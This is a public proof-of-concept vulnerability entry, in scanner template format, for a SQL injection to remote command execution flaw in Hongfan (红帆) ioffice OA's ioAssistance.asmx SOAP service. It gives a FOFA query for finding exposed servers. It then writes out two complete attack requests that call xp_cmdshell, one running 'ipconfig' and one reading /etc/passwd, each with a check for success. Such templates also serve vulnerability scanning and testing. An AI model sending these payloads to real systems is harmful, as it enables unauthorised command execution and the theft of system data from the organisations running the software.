漏洞描述
FOFA: app="红帆-ioffice"
hongfan-oa-ioassistance-rce: 红帆OA ioAssistance.asmx 注入RCE
PoC代码[已公开]
id: hongfan-oa-ioassistance-rce
info:
name: 红帆OA ioAssistance.asmx 注入RCE
author: duan
severity: high
verified: true
description: |
FOFA: app="红帆-ioffice"
reference:
- https://github.com/FridaZhbk/pocscan/blob/ee0c74e68ec95b82a4e4ebcdb961d6ed18a44b77/%E7%BA%A2%E5%B8%86/oa%E7%BA%A2%E5%B8%86ioAssistance.asmx%E6%B3%A8%E5%85%A5RCE.py#L47
tags: hongfan,oa,rce
created: 2023/06/25
rules:
r0:
request:
method: POST
path: /ioffice/prg/set/wss/ioAssistance.asmx
headers:
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
body: |
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
<sql>exec master.dbo.xp_cmdshell 'cmd /c ipconfig'</sql>
</GetLoginedEmpNoReadedInf>
</soap:Body>
</soap:Envelope>
expression: response.status == 200 && response.body.bcontains(b'Windows IP')
r1:
request:
method: POST
path: /ioffice/prg/set/wss/ioAssistance.asmx
headers:
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
body: |
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLoginedEmpNoReadedInf xmlns="http://tempuri.org/">
<sql>exec master.dbo.xp_cmdshell '/bin/bash -c "cat /etc/passwd"'</sql>
</GetLoginedEmpNoReadedInf>
</soap:Body>
</soap:Envelope>
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() || r1()